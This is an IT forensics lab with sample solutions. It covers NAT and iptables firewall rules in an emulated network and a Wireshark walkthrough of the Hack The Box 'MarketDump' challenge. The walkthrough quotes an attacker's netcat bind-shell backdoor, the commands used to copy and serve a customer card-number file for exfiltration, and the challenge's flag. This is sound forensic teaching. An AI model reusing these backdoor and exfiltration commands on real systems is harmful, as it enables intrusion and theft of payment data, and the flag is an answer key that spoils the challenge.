IT Forensics
Lab Week 8 Sample Solutions
IT Forensics Tutorial 8
Topics:
• Network Forensics Tools
  – Wireshark
• Network Security Device
  – Firewall
  – Source and Destination NAT
Covered Learning Outcomes:
• explain the motivations and landscape of network forensic investigations in an IT context
• become familiar with some of the network forensic tools
• deduce information and explain the events from captured traffic in a network forensic investigation
Instructions:
• Individual and group activities.
Files and access required:
• For this week’s activity you need an account on https://www.hackthebox.eu. In order to join hackthebox
you need to solve a hacking riddle. Give it a try; however, if you find it too difficult, there are guides and videos
available online.
• lu16d-coremu-v1.3.ova virtual machine (username: muni and password: muni) available via:
– https://cloudstor.aarnet.edu.au/plus/s/vhxKjdq5Jmk8Fis
See Appendix A for instructions on importing and setting up the VM.
Activity A - Understanding Source and Destination NAT
Make sure you have set up a shared folder between your host (laptop or PC) and the Lubuntu virtual machine.
Download the IT_Forensics_w8.imn file from moodle. This file is a CORE Network Emulator (henceforth core)
configuration file. Start the Lubuntu virtual machine, open core, and from the File menu open the IT_Forensics_w8.imn
file from the mounted shared folder inside the VM. In this setup ns-argos is the Authoritative Name Server for the
domain argos.edu. The node sphinx is the Authoritative Name Server for the domain delos.edu. The node
Internet serves as a DNS Cache Resolver between the two aforementioned domains.
Tasks
1. Run the emulation and open a Wireshark window on the eth0 interface of the node Internet (right click,
move the mouse over Wireshark and select eth0), another Wireshark window on the eth1 interface of the node
phoenix, and the final Wireshark window on the eth0 interface of the node selene. Open a terminal on the
node selene and type the following command:
lynx www.delos.edu
Stop the capture in all three Wireshark windows. You can save these files for further analysis.
a) Open a terminal on node Internet and execute the following command:
ip route
Does this node have any routes for the networks behind the node phoenix?
No. The routing entries are as follows, with no entries for 10.1.1.0/24 or 10.1.2.0/24:
10.0.3.0/24 dev eth1 proto kernel scope link src 10.0.3.1
10.1.3.0/24 dev eth0 proto kernel scope link src 10.1.3.1
172.16.1.0/24 via 10.0.3.2 dev eth1
192.168.1.0/24 via 10.0.3.2 dev eth1
b) Observe the packets captured in all three Wireshark windows and explain how the node selene is able to
visit the page hosted on the node www-delos. Can you make sense of this process? (Hint: some sort of NAT
is being performed)
First the name www.delos.edu must be resolved to an IP address. The DNS request is sent from selene
to ns-argos. ns-argos forwards a query to the Internet node, which is also running a DNS server, a DNS
cache resolver. When the forwarded request passes through phoenix it matches a defined Source NAT
rule and its source IP address changes from 10.1.2.10 to 10.1.3.45, with a random port number which
differs from the original port number used by ns-argos. The resolver then responds with the requested IP
address (it performs a forward to node sphinx, but that is not of interest here). In this response the destination
IP address is changed from 10.1.3.45 back to 10.1.2.10.
After the name is resolved the client makes a TCP SYN request to 172.16.1.11 from its internal IP address
range (10.1.1.31 or 10.1.1.32). When this request passes through phoenix it is matched with
another Source NAT rule which changes the source address to a random address in the range
10.1.3.50-10.1.3.51. Similar to the DNS request, the port number of the SNAT request is randomly selected and
differs from the client’s SYN request that enters through the eth0 interface of the node phoenix.
2. Close or minimise the Wireshark windows from the previous sub task. Open a Wireshark window on the eth0
interface of the node Internet, and a second window on the eth1 interface of the node phoenix. Open a
terminal on the node apollo and enter the following command:
lynx www.argos.edu
a) Observe the packets in the two Wireshark windows and explain how the node apollo is able to visit the
page hosted on the node www-argos. Can you make sense of this process? (Hint: some sort of NAT is
being performed)
You can save these files for further analysis.
First the name www.argos.edu must be resolved. The node sphinx forwards the request from apollo
to Internet, which will forward it to ns-argos. Here there is a Destination NAT which maps the DMZ
address 10.1.2.10 for UDP port 53 to 10.1.3.40 UDP port 53. Hence the request from Internet is sent
to 10.1.3.40. That is, from any node outside the Argos network the DNS server of this network has the
IP address 10.1.3.40. When this request arrives on phoenix it is matched with a DNAT rule and is sent
to ns-argos with the destination address changed to 10.1.2.10. ns-argos responds and the response
passes through phoenix, where its source address changes to 10.1.3.40.
The client apollo then sends a TCP SYN request to 10.1.3.40 port 80. Again this request matches
another DNAT rule on phoenix which maps this address:port combination to 10.1.2.11:80.
The destination address is changed by phoenix and the packet is sent out of the eth1 interface. The response
comes back from the www-argos node and when passing through phoenix its source address is changed to
10.1.3.40. This process continues for all the packets that flow back and forth between apollo and
www-argos.
3. Stop the emulation, open the configuration window of the node phoenix, then locate the Firewall service and click
on the wrench icon to open the edit window. You will find 11 sets of commands. For each set briefly explain
the purpose of the set of commands.
Solution
#!/bin/bash
# Set 1: Setting Filtering policy
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
# Set 2: IP address for Destination NAT
ip address add 10.1.3.40/24 dev eth2
# Set 3: IP address for Source NAT of DMZ servers
ip address add 10.1.3.45/24 dev eth2
# Set 4: IP addresses for source NAT of internal clients
ip address add 10.1.3.50/24 dev eth2
ip address add 10.1.3.51/24 dev eth2
ip address add 10.1.3.52/24 dev eth2
ip address add 10.1.3.53/24 dev eth2
ip address add 10.1.3.54/24 dev eth2
ip address add 10.1.3.55/24 dev eth2
# Set 5: Source NAT rule for DMZ servers
iptables -t nat -A POSTROUTING -o eth2 -p ip -s 10.1.2.0/24 -j SNAT --to-source 10.1.3.45 --random-fully
# Set 6: Stateful inspection for DMZ dns server as a client forwarding requests to Internet dns cache resolver
iptables -A FORWARD -s 10.1.2.10 -d 10.1.3.1 -p udp --dport 53 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A FORWARD -d 10.1.2.10 -s 10.1.3.1 -p udp --sport 53 -m state --state ESTABLISHED -j ACCEPT
# Set 7: Stateful inspection for DMZ mail server as a client sending SMTP mail to any other mail server
iptables -A FORWARD -s 10.1.2.12 -p tcp --dport 25 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A FORWARD -d 10.1.2.12 -p tcp --sport 25 -m state --state ESTABLISHED -j ACCEPT
# Set 8: Source NAT rule for internal clients
iptables -t nat -A POSTROUTING -o eth2 -p ip -s 10.1.1.0/24 -j SNAT --to-source 10.1.3.50-10.1.3.55 --random-fully --persistent
# Set 9: Stateful inspection for internal to anywhere
iptables -A FORWARD -i eth0 -s 10.1.1.0/24 -p ip -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A FORWARD -o eth0 -d 10.1.1.0/24 -p ip -m state --state ESTABLISHED -j ACCEPT
# Set 10: Destination NAT rules for dns, web, and mail
iptables -t nat -A PREROUTING -i eth2 -p udp -d 10.1.3.40 --dport 53 -j DNAT --to-destination 10.1.2.10
iptables -t nat -A PREROUTING -i eth2 -p tcp -d 10.1.3.40 --dport 80 -j DNAT --to-destination 10.1.2.11
iptables -t nat -A PREROUTING -i eth2 -p tcp -d 10.1.3.40 --dport 25 -j DNAT --to-destination 10.1.2.12
# Set 11: Stateful inspection of DMZ servers serving the internet
# DNS
iptables -A FORWARD -i eth2 -d 10.1.2.10 -p udp --dport 53 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i eth1 -s 10.1.2.10 -p udp --sport 53 -m state --state ESTABLISHED -j ACCEPT
# Web
iptables -A FORWARD -i eth2 -d 10.1.2.11 -p tcp --dport 80 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i eth1 -s 10.1.2.11 -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
# Mail
iptables -A FORWARD -i eth2 -d 10.1.2.12 -p tcp --dport 25 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i eth1 -s 10.1.2.12 -p tcp --sport 25 -m state --state ESTABLISHED -j ACCEPT
4. Does Source and Destination NAT have any relevance to network forensics investigations?
Yes. If Source or Destination NAT is performed, the ultimate source or destination of a network packet may
be different from what is observed in captured traffic, which needs to be taken into consideration as there
may be multiple potential sources for a given packet. It may be necessary to look for any available log of Source
NAT to find out the original IP address of a captured packet. If no log exists then this fact must be considered
in evaluating the weight of the evidence.
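The following Python is an added example (not part of the lab) of the attribution step just described: given a 5-tuple captured outside phoenix, look up the firewall's SNAT translation log to recover the inside host, and look up the static DNAT table to find which DMZ server a connection to 10.1.3.40 actually reached. The log format is constructed for this illustration; a real firewall NAT log or conntrack dump needs its own parser. The addresses follow the lab topology (DMZ SNAT to 10.1.3.45, internal clients to 10.1.3.50-10.1.3.55, Set 10 DNAT rules); the timestamps, ports and hosts in the log are made up.

```python
"""Recovering the pre-NAT endpoint of a packet seen on the outside of phoenix.
Added example; the NAT log format below is constructed, not a real firewall's."""

import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Static DNAT table taken from Set 10: (proto, public ip, port) -> (real server, port)
DNAT_TABLE = {
    ("udp", "10.1.3.40", 53): ("10.1.2.10", 53),
    ("tcp", "10.1.3.40", 80): ("10.1.2.11", 80),
    ("tcp", "10.1.3.40", 25): ("10.1.2.12", 25),
}


@dataclass(frozen=True)
class NatRecord:
    t_start: float       # when the SNAT mapping was created (seconds)
    t_end: float         # when it expired
    proto: str
    inside: str          # original (pre-SNAT) source address
    inside_port: int
    mapped: str          # source address seen outside phoenix
    mapped_port: int
    dst: str
    dst_port: int


# Constructed SNAT log. The mapped port 10.1.3.50:61007 is reused by a different
# internal client at a later time, which is why the capture timestamp matters.
NAT_LOG_TEXT = """\
100.0 160.0 udp 10.1.2.10:41523 -> 10.1.3.45:52001 => 10.1.3.1:53
101.0 200.0 tcp 10.1.1.31:50211 -> 10.1.3.50:61007 => 172.16.1.11:80
300.0 360.0 tcp 10.1.1.32:50312 -> 10.1.3.50:61007 => 172.16.1.11:80
"""

LINE_RE = re.compile(
    r"^(\S+)\s+(\S+)\s+(\w+)\s+(\S+):(\d+)\s+->\s+(\S+):(\d+)\s+=>\s+(\S+):(\d+)$")


def parse_nat_log(text: str) -> List[NatRecord]:
    """Parse 'start end proto inside:port -> mapped:port => dst:port' lines (constructed format)."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unparseable NAT log line: {line!r}")
        s, e, proto, ins, insp, mp, mpp, d, dp = m.groups()
        records.append(NatRecord(float(s), float(e), proto, ins, int(insp),
                                 mp, int(mpp), d, int(dp)))
    return records


def find_inside_source(records: List[NatRecord], proto: str, mapped: str, mapped_port: int,
                       dst: str, dst_port: int, at: Optional[float] = None) -> List[NatRecord]:
    """Return every log record that could explain an outside-observed 5-tuple.
    With a capture timestamp the answer is normally unique; without one, a reused
    mapped port yields several candidates; an empty list means the log cannot
    attribute the packet at all, which weakens the evidence."""
    hits = [r for r in records
            if r.proto == proto and r.mapped == mapped and r.mapped_port == mapped_port
            and r.dst == dst and r.dst_port == dst_port]
    if at is not None:
        hits = [r for r in hits if r.t_start <= at <= r.t_end]
    return hits


def resolve_dnat(proto: str, public_ip: str, port: int) -> Optional[Tuple[str, int]]:
    """Map a destination seen outside (e.g. 10.1.3.40:80) to the DMZ server it reaches."""
    return DNAT_TABLE.get((proto, public_ip, port))


if __name__ == "__main__":
    recs = parse_nat_log(NAT_LOG_TEXT)
    # Outside capture showed 10.1.3.50:61007 -> 172.16.1.11:80 at t=320
    for r in find_inside_source(recs, "tcp", "10.1.3.50", 61007, "172.16.1.11", 80, at=320.0):
        print("original source:", r.inside, r.inside_port)
    print("10.1.3.40:80 really is", resolve_dnat("tcp", "10.1.3.40", 80))
```

Without the timestamp the same query returns both 10.1.1.31 and 10.1.1.32, which is exactly the "multiple potential sources" situation the answer warns about.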
5. Install the nmap tool using the following command:
sudo apt install nmap
Run the configuration. Open a Wireshark window on interface eth2 of the node phoenix. Perform a port scan
operation from the node apollo for the address range 10.1.3.40 to 10.1.3.60. Share your observations with
the class.
nmap is a port scanning tool. It has some detection mechanisms to also detect/guess the OS and application
based on the responses it receives and open ports it finds. We can control the extent of the probe that nmap
performs. For this activity we are only interested in the captured traffic, to become familiar with the effect of this
tool and its traces in network forensics.
nmap -A -T4 10.1.3.40-60
Activity B
Log in to your account on https://www.hackthebox.eu inside the VM and click on Labs (on the left pane), then
Challenges, then click on Forensics and open the MarketDump challenge.
Figure 1: Log in to hackthebox and navigate to Labs > Challenges > Forensics > MarketDump
Read the description of the challenge and then download the zip file and extract the packet capture file. The
password for the zip file is hackthebox. Open the pcap file in Wireshark.
Figure 2: MarketDump challenge description and file download
Tasks
1. Can you explain how the attacker has identified a vulnerability in the target machine?
The attacker starts with scanning the target using nmap which is evident from the large number of TCP
SYN requests to many ports followed by many TCP RST and few established connections revealing
open ports on the target machine. The nmap signature scan can also be found in frame 2357 with GET
/nmaplowercheck1531136698 HTTP/1.1
2. Can you identify the services running on the target machine? Try a display filter that shows the server’s TCP SYN
+ ACK responses. Check out Building Display Filters for more advanced filters.
Applying a filter such as ip.src == 10.0.2.15 and tcp.flags.syn == 1 and tcp.flags.ack == 1 will show
the server’s responses to the port scan, the SYN+ACK packets that identify the open ports: 22 (SSH), 53
(DNS), 3306 (MySQL), 80 (Web), 5432 (PostgreSQL), 631 (Internet Printing Protocol).
3. List all the TCP and UDP communications between the attacker and the server (Menu bar > Statistics >
Conversations). Observe each TCP stream and identify interesting connections (from bytes exchanged).
4. Identify the protocol used by the attacker to gain access to the server (identify the TCP stream).
Telnet. Applying the display filter tcp.stream eq 1053 and then following the TCP stream shows the following:
USER: admin
PASS: admin
Welcome, admin
Here is you're daily stock report!
PRODUCT  PRICE  STOCK
SHIRTS   20$    50
JEANS    40$    99
WALLETS  15$    19
SOCKS    10$    100
Type exit to exit the program: exit
5. What program and command does the attacker use for persistent access to the server?
The NetCat program; the command used is nc.traditional -lvp 9999 -e /bin/bash, which
uses the -e option allowing a program to be launched remotely (an option nc.openbsd does not provide).
6. List all the commands the attacker has used after establishing a persistent connection.
Commands and their outputs:
ls -la
total 344
drwxr-xr-x 2 vigil vigil   4096 Jul  9 13:42 .
drwxr-xr-x 6 root  root    4096 Jul  9 13:38 ..
-rwxr-xr-x 1 vigil vigil 339920 Jul  9 13:24 costumers.sql
-rwxr-xr-x 1 vigil vigil    593 Jul  9 13:14 login.sh
pw
pwd
/var/www/html/MarketDump
ls -la
total 344
drwxr-xr-x 2 vigil vigil   4096 Jul  9 13:42 .
drwxr-xr-x 6 root  root    4096 Jul  9 13:38 ..
-rwxr-xr-x 1 vigil vigil 339920 Jul  9 13:24 costumers.sql
-rwxr-xr-x 1 vigil vigil    593 Jul  9 13:14 login.sh
whoami
root
wc -l costumers.sql
10302 costumers.sql
ls -la
total 344
drwxr-xr-x 2 vigil vigil   4096 Jul  9 13:55 .
drwxr-xr-x 6 root  root    4096 Jul  9 13:38 ..
-rwxr-xr-x 1 vigil vigil 333845 Jul  9 13:55 costumers.sql
-rw-r--r-- 1 root  root    1024 Jul  9 13:55 .costumers.sql.swp
-rwxr-xr-x 1 vigil vigil    593 Jul  9 13:14 login.sh
head -n2 costumers.sql
IssuingNetwork,CardNumber
American Express,377815700308782
cp costumers.sql /tmp/
cd /tmp
ls
config-err-lU04xV
costumers.sql
mozilla_vigil0
snap.1000_telegram-desktop_0UDXXk
ssh-8jVN4Kyx3X69
systemd-private-9ac4f21175984888b953531b43a88a47-apache2.service-lIsVqD
systemd-private-9ac4f21175984888b953531b43a88a47-bolt.service-Fd1LWs
systemd-private-9ac4f21175984888b953531b43a88a47-colord.service-rdNsnK
systemd-private-9ac4f21175984888b953531b43a88a47-fwupd.service-3d8iRg
systemd-private-9ac4f21175984888b953531b43a88a47-rtkit-daemon.service-pzu6lE
systemd-private-9ac4f21175984888b953531b43a88a47-systemd-resolved.service-ZtjIX4
systemd-private-9ac4f21175984888b953531b43a88a47-systemd-timesyncd.service-0BNKmh
Temp-bf8572b5-6aac-4c1d-aff6-063f56964ecb
python -m SimpleHTTPServer 9998
cat costumers.sql
IssuingNetwork,CardNumber
American Express,377815700308782
American Express,372184234300624
-- snip --
7. Identify the flag of the challenge. To decode the flag go to https://gchq.github.io/CyberChef, select Magic
from the operations, paste the flag as Input and click on Bake.
The encoded flag:
NVCijF7n6peM7a7yLYPZrPgHmWUHi97LCAzXxSEUraKme
and the decoded flag:
HTB{DonTRuNAsRoOt!MESsEdUpMarket}
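CyberChef's Magic operation guesses the encoding and decodes it. For this flag the encoding is Base58 (my assumption, consistent with the 45-character string using only the Base58 alphabet, which omits 0, O, I and l). The decoder below is an added example, not part of the lab or of CyberChef, so an investigator can reproduce the decoding offline and check the result looks like an HTB flag; the Bitcoin Base58 alphabet is assumed.

```python
"""Base58 decode/encode, added as an example of what CyberChef's Magic did to the flag.
Assumes the Bitcoin Base58 alphabet (1-9, A-H, J-N, P-Z, a-k, m-z)."""

from typing import Optional

ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58decode(s: str) -> bytes:
    """Decode a Base58 string to bytes; each leading '1' stands for a leading 0x00 byte."""
    num = 0
    for ch in s:
        idx = ALPHABET.find(ch)
        if idx < 0:
            raise ValueError(f"invalid Base58 character {ch!r}")
        num = num * 58 + idx
    pad = len(s) - len(s.lstrip("1"))
    body = num.to_bytes((num.bit_length() + 7) // 8, "big") if num else b""
    return b"\x00" * pad + body


def b58encode(data: bytes) -> str:
    """Inverse of b58decode, used here to round-trip test the decoder."""
    pad = len(data) - len(data.lstrip(b"\x00"))
    num = int.from_bytes(data, "big")
    out = ""
    while num:
        num, rem = divmod(num, 58)
        out = ALPHABET[rem] + out
    return "1" * pad + out


def identify_flag(text: str) -> Optional[str]:
    """Try Base58; return the decoded text only if it has the HTB{...} flag shape."""
    try:
        decoded = b58decode(text).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return decoded if decoded.startswith("HTB{") and decoded.endswith("}") else None


if __name__ == "__main__":
    # The encoded flag from the challenge answer above
    print(identify_flag("NVCijF7n6peM7a7yLYPZrPgHmWUHi97LCAzXxSEUraKme"))
```

Because Base58 has no padding characters, a non-alphabet character (such as 0 or l) immediately rules the encoding out, which is what identify_flag relies on to return None instead of garbage.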
Appendix A - Setup VM
Download and Install VirtualBox
• Download VirtualBox from https://www.virtualbox.org. It is available for all three major platforms:
Windows, macOS, and Linux.
• Follow the installation instructions for your operating system.
• Download the Oracle VM VirtualBox Extension Pack from the same web page (the file is read by
VirtualBox and is the same for all platforms).
• Install the Extension Pack after you have successfully installed VirtualBox. To install, simply double-click
it and it should open in a VirtualBox dialogue and prompt for approval.
As VirtualBox installs various system drivers it will ask for administrative privileges.
Download and Import Prepared Virtual Machine
The VM contains the required software used in lab exercises and/or assignments. One such tool is the Core Network
Emulator, which allows us to mimic complex network scenarios without the need to access physical equipment.
In exercises related to operating systems we can safely perform tasks that are contained in the VM without
accidentally changing the state of the operating system that runs our physical machine. It also allows us to provide
universal instructions and exercises that work the same way for all students, as they will be run within the
VM.
• Download the VM file: lu16d-coremu-v1.3.ova
– https://cloudstor.aarnet.edu.au/plus/s/vhxKjdq5Jmk8Fis
• The file is about 2.6 GB so it may take some time to download.
• There are two ways to import the file into VirtualBox:
– Simply double click on the file and a dialogue box from VirtualBox should open up that will guide you
through the importing process.
– Open VirtualBox and then from the Menu Bar: File > Import Appliance > Browse (find the file
using the OS file browser) > Continue > Import.
Set up a Shared Folder between VM and the Host
In this step you will configure a folder on your host machine (OS running on your physical device) to be shared with
the VM (guest which runs a flavour/distribution of Linux). We can use the shared folder to transfer files between
the host and guest.
1. Open VBox and select the imported VM (in Section-)
2. Right click on the VM and select Settings as shown in Figure-3
Figure 3: VM Settings - Method 1
An alternative approach is to select the VM and then click on the settings icon in the tools panel (Figure-4).
Figure 4: VM Settings - Method 2
3. Click on the Shared Folder icon in the settings window, then click on the folder icon with a green plus on the
right side of the window to add a new shared folder (Figure-5)
Figure 5: Adding a new shared folder
4. From the Folder Path in the opened window click on the drop down icon and select Other which will open the
OS file browser to select a folder on your host machine to be shared with the VM. After selecting the folder
check the Auto-mount option to make sure it will be mounted every time the VM is booted (the shared folder
is presented as a network attached storage to the VM). Figure-6 shows my chosen Folder Path and Folder
Name as well as the Auto-mount option.
Figure 6: Selecting the shared folder and checking the Auto-mount option